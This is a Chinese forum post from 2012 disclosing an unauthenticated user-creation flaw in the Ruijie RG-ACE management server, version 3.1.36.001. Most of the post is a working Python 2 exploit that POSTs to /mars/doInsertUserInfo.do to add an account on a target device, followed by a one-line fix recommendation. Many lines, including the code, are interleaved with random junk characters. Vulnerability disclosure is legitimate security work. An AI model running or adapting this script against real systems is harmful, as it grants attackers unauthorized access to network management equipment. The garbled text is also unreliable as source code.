找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2116|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
: m# W6 T) {* y- X1 ]4 q( }' D  I: I( q5 `1 Q5 w- U" [" L7 {1 i! M

6 I- O+ {% X5 Z6 W; n测试的具体版本是6 Y* X% x8 i% J) s5 H5 N7 F8 h
产品名称: 锐捷应用控制引擎
! p8 @8 B! }( [6 M版本号: 3.1.36.001 TC) B( s& f3 N; u! A; V
编译时间: 201104291730! R- m$ ?7 J/ _5 ?

" [% \( y/ ~. y1 }# }0 n3 V0 D
/ U! G" G, L! N" u) X- P4 _漏洞证明:
; H5 A2 _( u; w0 x ' {: v; \0 @6 N, R4 F9 X
' {+ t2 \3 L, _/ x2 k1 V

' S' f7 d! E- ]1 Y' G8 C3 C" E3 z! v+ ~
& ?1 a( h/ }' m6 U+ z" V6 B4 v
! N6 m2 T$ g3 v0 Q1 a
执行脚本8 O+ _, f# A) w- @; X0 J
#! /usr/bin/env python" f& }2 d3 p$ C1 k! q. S
#coding=gbk7 j  j. S5 C& P- M9 u
#RG-ACE管理服务器 V3.1.36.001) c) @9 a* A' B+ R) Z0 [* b
import urllib2, urllib,cookielib9 v- @, S) [# W) Y
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP4 [6 g- f% `7 x+ D: D9 G4 s3 F
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))8 g  P# G7 B4 q& t+ B) ]) x! o
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]7 l! C' K! n8 B9 X( n4 q& D
post=(("event","userManager.doInsertUserInfo"),
4 F. D. Z6 O2 D6 Y& T("useractionname","addButtonValue"),
- M4 X# k9 u7 ~) S("useropermanager","userManager"),+ t9 T2 }5 v6 j
("userName","t"), #######账号自己加
5 G6 T4 a. V1 ^' X9 z* L("pwd","aaaaaa"),######密码自己加" t+ l+ I" }# N6 W
("trueName","ad"),
$ S- D. P- ?  H6 A0 I, l* b("email",""),. l% ]3 [1 t1 Y4 r1 b' k
("mobilePhone",""),+ [. Z1 K; n  z% A- ]4 o
("officePhone",""),
; ^& _+ v% d1 Z% V" |* _("addr",""),
  x* g( U# n+ O6 w5 k& M; d& ?("submit","确定"))4 n1 s. z6 j1 J2 X/ o2 N. r& [& P0 M
urllib2.install_opener(opener)
5 |8 f  p* a! V( G  ?6 S# Gp=urllib2.urlopen(url, urllib.urlencode(post)).read()
$ T3 t& y( }: C- b) C7 S: q( Z6 s; Rprint "Done"# l2 s" w* w( Z: ~) N& b, I

; k9 ?$ o) n: \$ F5 j* [9 }) L7 C登录,连接设备7 L# i* N6 x+ E/ p3 E" k5 n- t

: j/ V$ B$ M/ n$ b- G
  V0 _/ j. N7 @$ q3 ^' c0 v* j+ h  h- \- X* f; k) O
. y/ l0 G) F0 f' y5 A2 i: N+ v3 ?
" a5 J+ @( Q1 ~1 T2 {: q
默认的管理员admin权限更大点
% {2 s! h8 [/ K" t# {6 Y2 f3 b
" ?% X$ S0 o( t$ _5 x" C, Q$ U/ I' ]) k
( ^  |4 R1 g, q. v
8 R2 _4 h! l: m
0 H6 |* I/ g: \! D, s
修复方案:
: H( o9 z2 N) R. D  }3 H( C加强对接口的权限验证
. I# B- V4 C& p- J1 t( e5 s* l# B- b( U
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表